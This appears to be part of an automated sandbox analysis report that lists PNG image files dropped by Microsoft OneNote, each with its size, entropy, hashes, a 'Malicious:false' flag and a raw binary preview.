                                                                                                                                                                                                                  SSDEEP:96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
                                                                                                                                                                                                                  MD5:A1A1017A6A7928761CEB56D1D950E123
                                                                                                                                                                                                                  SHA1:28272E9C7F816A1CE8F2033FC00F489005332365
                                                                                                                                                                                                                  SHA-256:72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
                                                                                                                                                                                                                  SHA-512:10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............n.<.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].\TU..}...E.0.T....L~....af..Z.....O..4..>Ms..Js_....5.E.d...Y....?\z.3..}.l..|?~...{.....s.z..Y.............E.X.6...c..u...y..W.j....."}...l.i.`.!-!-......MKH.E.bi.d...b.X.)...X4 .vJ6-...;..+/.->Qyi.t...%.T..k;.U..y.C$[;..Gm.......v..*2..2..eee..."!..)...yy...III./..u........2....M.:''...W.....o..t...._.6m.... .`,k.T.v."..q.......s~~........O....ed.[W0X..HB.V.i.....<=..E^^......MyY..vpp...........^6.....aQQQaaa........]^^nkg../_.d`.%......L&k..B......?C....W.VVV6660t.J+K.:..%q.....e.cp....Kz..%.qZsAR\T.!......>55.R.u.W\\.L....T...K..rE.U.K.-9......y.y.......K....>...HWTT.e....+..B.......%%%......^...|...M'.%.f!/..=p...{O..../...@...DP..hw8....7o>..A.mgg......7-']~.s.OE.E.|=.......'%!y.......\.....MSn.i.........!...U.$0S .......Z.P.}[.%X[.;{....N.....\......6O.....'.N}.}s.m...E..V..f..r...4..~.......H..F.}....4,.R.=.......xT..4......./...,z
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1604
                                                                                                                                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1604
                                                                                                                                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1604
                                                                                                                                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2232
                                                                                                                                                                                                                  Entropy (8bit):7.837610270261933
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
                                                                                                                                                                                                                  MD5:EDB5ED43CC6038500A54B90BEC493628
                                                                                                                                                                                                                  SHA1:A8CD63F3914E4347F4C5552FB922C6C03917F45F
                                                                                                                                                                                                                  SHA-256:9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
                                                                                                                                                                                                                  SHA-512:4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d...MIDATx^..hVU..}..s:..6..9g.MM3...j...*........A..!.A.....R.Ai%YH..(M.".h.cf*.B.......:...{w.{.......y.s>.{.{.=.........#.y..r.K...K.0}......Y..b..[N.=....j.=........!......./.6....B.8....p....5P)....@......=}............^.~..@.o`n<.q.....Yw]..mg\V*...y.W.T.>...\n...s.iG.~L]..d.<.8..j<.<1..4...CZ0...}...........oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..L....5.7""4`..p.........'.kt.....>!\.k.oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..I..x........Z^...>B$1.N"}4.....1:&F8..*.X.yL(..s.3......~2.EL%.w.Uc.zJ...B..S..b.7o|%..7..'.....N.|..Vi...q..uO,`/....\W{..y...&iI..|X&T.........-........Z..o.~u..U....cF.M....O4}......~......:T..W.._s...t..Dlb.$Pr././.._4.b......R.T$t..$.>hB. +.{......m.w .Q...05..C.}...}.....?..h.....Y .8.6^t....}.y.%......l=$..[.~..]..h..N.......*....SB.|....8..H......_...G...|......;6YQ|WO.o.}]..'.$..oE.y...i'9.[cmS..@m@.Q
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):19235
                                                                                                                                                                                                                  Entropy (8bit):7.944867159042578
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
                                                                                                                                                                                                                  MD5:AE32E846559D576FD263BD69FEDBEC28
                                                                                                                                                                                                                  SHA1:D481DF71C858BAECFE33418002D368F2DCF68D4A
                                                                                                                                                                                                                  SHA-256:6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
                                                                                                                                                                                                                  SHA-512:9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d..J.IDATx^...X.W....D..A......bW.A..[..5.F..D...7.ob71.....b.."...("...(...{/...e......}.....;...S.X...H...@d...... &.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..O.KVfVfjFzJzVF.}i{.R..l..q..`I....e.'./.'.G.z.*!&>)61.UjVzf..4>Q~...U..=......s.\..WE...2...t..`F....M....'..?.......>BO(m.V.P....Gy.../........B.6.......=|z7.Z.|hQ..u..j............&..Z.bo?.u...S7.G>......]I..7.i...3....<.y.l]....SI>...L.2..<.....[.'=M.Tsprp...T....cE'*..P........eefQ.NKN.x....:-#5#....q/..xq.YzJ:.T.*u.j..S.C=...|.....2..(YF........|...*.7t...{.jz....W..Y..{...nlfj...L.6.[.hS.=.....(!C.......?5..+...[..a.:U.K..C.......w......+..r@.z.7..j..qB..B.....X}..=.fk...>^5[....n.z....wn....Z4.._iWG.^..z6./]t......dhM.9s...Gbo?...U.V..tj.......*&)Io.{q.G...A...l...i7...&....d.E]....#.W.x,.T...&Mz4+].4.$n..F..x...<.ppr.............y.,i./..
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1604
                                                                                                                                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):5386
                                                                                                                                                                                                                  Entropy (8bit):7.943706538857394
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
                                                                                                                                                                                                                  MD5:DB48555480A383CD1D4DD00E2BCFCF29
                                                                                                                                                                                                                  SHA1:8060B6FE12175289F0A71F45B894030A0D9F1AB5
                                                                                                                                                                                                                  SHA-256:807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
                                                                                                                                                                                                                  SHA-512:2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............gI......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..xTU..M..B...P........)vQpQ.ED.""......,."....*bC..VT.. M!...@z....1...Wf.w..o29...=.v.TUU..^..@....S..<..;h...5.9r....x..7N{...=........'...N...u...9..5+YW.;..N\..u...9..5.....O....,.K..'.../.....1..T....>.f..9.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo........'L...g.UVVz.[.n)...Yqq...Y.f.)//_.l.W_}.,........S^Z^Y..++.*..pF.....?...I.&...O,.k.d...~..w;Q........7}1y......e_............=y._U....{..}.w.O..~.z.{........W\q.."........^.h........}p.+.>m...d...4...`a~Z^....me......:N]..1...g..y.f.......l..g.).......e[........Z..RB.KrJ.....#...{..eff..v.[[<.n..?{.....SN9%...V.yE...s2..........e@Wz..I...B.r..<.-.=/t{.v.|..J....,.@.A.v...s`/.....6f....L?.z[T7..)S0.;c....\s..z-C.....v..}Y..{..j..xF.....'.#_..C....k|3..8...N...5......f....3......f)-.p..%.D.v.v.].f.......33<<......[bbbt.]w...:.r.....z....q..=....m.uhD..,..zXg
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4081
                                                                                                                                                                                                                  Entropy (8bit):7.943373267196131
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:KQJAeRumk2zXWySlEmWL9zi6wknB4qLx+ppNhQrW8Oy:Ke9S482LE6wQB6pNeqi
                                                                                                                                                                                                                  MD5:29B87BEEC5D3899824AA390530CD47FB
                                                                                                                                                                                                                  SHA1:55108E8E5692E4444F72EE5CEB91915E7A2AEFC8
                                                                                                                                                                                                                  SHA-256:F00E4F1C9B1D9ABEAAEC8E5CAB02A07FD74F00ACE15E36C6F6469DE5AB07A9FC
                                                                                                                                                                                                                  SHA-512:1A5AD45BBA8C29C32CDD3C4D1E460C30ECA305D851FAAC73DF165306BC338337525680B9906D367A0CD3852B9D2DAAA8FD0603276BA969495B4E29C7EC8A3530
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......Y.....2.h.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].LTW.f..O.a.......*.....k...M.Z.n.q.h....ht.f.M.n.6..t.h.k.h5.6][[....X..p...?..g.`..7.o..of....^.ys..{.{...s.UMMM.(.l.@.l..R?.......(0+0.......5...*.F..#.].........1.....B[>[..a..L.....x...0.5t.v..S.h!.........Y....B..&.......f#.w5u...............0...x.sC....a.4j5V..Z..n....K..>...3t..wm..3hB.BD.P..FkcJ6.....O........7...S.........6..P.]mf.+o....w..<.......Y..Z.whd.....*zf+.....#."_?....`.._... qf+.?.?"k...zgME..j..!.k.U*.....&z..N....ma.......R.{.r0.S..KP..fU....g~..=..Q.n.*.* 8T=/'9,*.KDW...GN;0(P3_....1......'.;..;|.L.a.&<*\.d......o...Y... {E.F..}.e.\..=W..#..W....c./~..b.EWXI.#.''&.........:....X...b.....+2...5..6+)we~ja:lZ.d.Ey....l.2.5r........!.!._|.A.....j2.5.o.....WOM....V......GC9..'.... ....C..,._...cS....b.1.....t.........._........a.3..K..>V.f]...~....K...-........#.o.Y.P........a.7..,#..'s...T.....b..]..3..dPPP..Y.i...c.b
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):11332
                                                                                                                                                                                                                  Entropy (8bit):7.9324721568775285
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:vpXZavBpl00n1Pt7JquG9GYHDK/5cxektxMQjcie9ZZkx30eXJIb8FKRN:vpZaDyc1P1Je9G62/5clpjre9nQkeXJY
                                                                                                                                                                                                                  MD5:31579CA3352DF8FA4E3E7F48C7CDF672
                                                                                                                                                                                                                  SHA1:AA682A3C781BF8EE43B5EDC9718E64CB79135F25
                                                                                                                                                                                                                  SHA-256:B0E7824BEE2C896279457D87E61E902431BEB528D830524CC4DFAE126E89FC24
                                                                                                                                                                                                                  SHA-512:782FF9492E3ECB11C72D316DDD94D1F3E94CD908FC9452A37DA6CA30ABCFE9AB2BCCED8583A569DA68626BCEC730408AF86997E295637BF64AFF5BC768F3E309
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..+.IDATx^.{...u./-...&....6..+z..Q."b*. &M.d-e.*.. ....J..Z-T.Z$....R..F...%*`bn..<.....W.E ..w....^...;g..[w.5w.9g...3......t8t.P.?$@.$@.5...=.8qb.... ...5...a=...#.y. ...@B.....am. .. .......$@.$`.....G.B.$@..S... ...C.zj.#[!.. ..).......!@=..........}..H.........VH..H.z.>@.$@.v.PO.pd+$@.$@=e. .. .;...v8... ...................f.o_o{....~t...n.S.N..?..._..L;J.H ..,....7.}...|....7...b...|.........ObVa1. .?.X.....~.....t2..V>.b.}..0.F....%`GO7.n#~..F....K.~...FX..H.^....k.Z/.2v.W..M.<.;$...v.t..,UO.-]............D.....o.J..Y........5.%.l....{.....'O..dC$....=uks..;{x.,.N.=.."..Q]..w>.E.H........AV=...f.&. ..ip}._0.~[pf.`..9..v.W.,..2.E.$P........+...OcC.H..=..|..[..g%(h.....W...?...UDh..T$..?....|.]..)?[Wo.h.'..2P.1..!.......$.NO.5..}...c.;...~.x,|Q....B..6.@>..y..}...m...D~z....L#.0`_.`.s?|....I.....a...=N....c.._.2.._..6 .]...5....{.^>.lM..;n...k..9J..S.G..{.
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2270
                                                                                                                                                                                                                  Entropy (8bit):7.845368393313232
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:3Cxnazs22lovji2Ez2iqBU2C+hJWizJNzIu1coqAYClBeMsk1:3dm2Ez2iUhBzhyjAxqQ
                                                                                                                                                                                                                  MD5:6EFE6733E10E011FFDD6711B5F37C9E2
                                                                                                                                                                                                                  SHA1:C72549E824EAD899944A38C46FBC28BDCDAAD611
                                                                                                                                                                                                                  SHA-256:92B5056DAA03DF3EA85AF49FFE4F9CFE8699BDF3539576A99F02418FF49AD9CB
                                                                                                                                                                                                                  SHA-512:EC14B553A5780CD9B33D438CE13A6932DE43E346D8D2DEC8D093A6A2048675423948F8E2C604A73460980C3C68D9276B65D76C2A6BC7B24FDF10CA92FDA2583E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......2............sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^.\kL.W...*.F......@.*.(H4."iI}..B!.iD...I-....y.I.h.....<..1.....C..(XSy.l....,-,.......3..3...;.{...{.{g.....Q..x.T/q...F.V...B..'..?{:.:...`.........+.0s.e...w....{.`. ....5...d..9S]../............$Y.>.I....i..8....;,r8r!Ee'"..!*.&E.....n...=.@..Sp.GF..c*....1QH3....?,.T.el......t?..([Q`.0....k.G.....X..C...k|p...I.q;.d..N....c.u.a.5.%.k.fS\)..H..T.~l*k.[.n...x2.1...........%...yK..a..l.[.?#..fD%.FMT. =r.jt^..fT...c.&..Lr..............\..V.ll....Br^6..U27...O..N*..K.gm.K..g.;..l..Fe...w?..Q.E......0.........7...(.e..t...x.c6..Q..n.92:%....l..4.h]Z.....w..|..!.p.~..B.y..&.......gl...\.wI......G.6.K.$...%.-.h]\8.LT.....}{a...^.i......4.0.ji...........n.pk ......7t....U9..b...I.....#...<q..(|=F.......0@^......+..........X. .>p....S..t.].f.x.0....7d..n..'..'... .M.qqn...G.t8'.=..V.PK....K...X.z.#..I.....@...Y....BH..I.....,..K....=`&Z.41$..a'o.:....i{o
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):14553
                                                                                                                                                                                                                  Entropy (8bit):7.951135681293377
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:EF7aDrPYJ1n3kaEf61xD+KvdokCixTQm7QA96dNT:EF7a/PMeaEf61lT6kCiFQCQq6zT
                                                                                                                                                                                                                  MD5:3E9F7D399DF9CAD3669B7A5445EF7074
                                                                                                                                                                                                                  SHA1:2FBC965DC03EF9203581F595E0D7AB1734726ED7
                                                                                                                                                                                                                  SHA-256:76C80E31F37248C3C787F7972A7B22038390F9D81E72E650071A6F36D36AF27A
                                                                                                                                                                                                                  SHA-512:326F8F9CBF829BF80AAA96062A57255A36EE04DE310634327AA075D14129CFA8E36E48AB2A00B10F9BDC1D94F1AC7A9E41D0D063361920A0332EC124BDF4C3EE
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..8nIDATx^..xT...!=!$..%t..H.tP:.HQP@E,...QQ.^.....* E.(" ]:.K..R......p..n.9{...sv.}.....7.....o..z...,|.......M +.....w........O...>.SJ.O...<...{. .x..g..I..H.......V .. .}.PO..H+$@.$@=.=@.$@.......VH..H.z.{..H...!@=.#...............C.z..GZ!.. ..)... .....T...B.$@..S..$@.$....>.i..H......H..H@...S}8......POy......>....p... ...... .. .}.PO..H+$@.$@=.=@.$@.......VH..H..zz?.......$@.$`i......c;.n..i...0..........<......S....w..c.....y..F4.p..3~..|.]....s.6[..H...N@.=M..|`...3./...I.....'..|..K...r|...nX...'.. .G...ib|...MY8|......9x..Ur'.. ._ .....5..H..d..L.$@..I..o.;kM.$.?........K/.wn......Y....E..%K*.=.......Y.3.!k....[V..WG/?i..H..." T.,z...6h.[..-%9....WMY...z.vH..H@/.BOe....g-P.@.......lH.O...SJ}5.|....?.^..5^}..$.. .....S.@...*<.gJT/......_.R.C.....rj..Cg'\K........K....~Y....l@..)..l.k.s..Yr.....Z]jG..q.+..G...;lNJj.}..T1&&.. .....?...|....W<{...g.&'Ca
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):11886
                                                                                                                                                                                                                  Entropy (8bit):7.946442244439929
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:sqNuEpzsnKxkfLaZCdMh+cLApmRausyZwYMAisQKShDBlhr34ckckcZ:JNu6DMLaZsMhtLAIa0wYMAvI5V4DDQ
                                                                                                                                                                                                                  MD5:875CFB3B5C3619253223731E8C9879E5
                                                                                                                                                                                                                  SHA1:6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E
                                                                                                                                                                                                                  SHA-256:CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
                                                                                                                                                                                                                  SHA-512:47F45A3275B8454F8000F4567153DD7D4AF3012005D8E34CB18AED6AD69083BEC753E607F275FBF3EFCCB7BA00310A04ADFBD5FA5B73E6BBE47CE73901C35CA8
                                                                                                                                                                                                                  Malicious:false
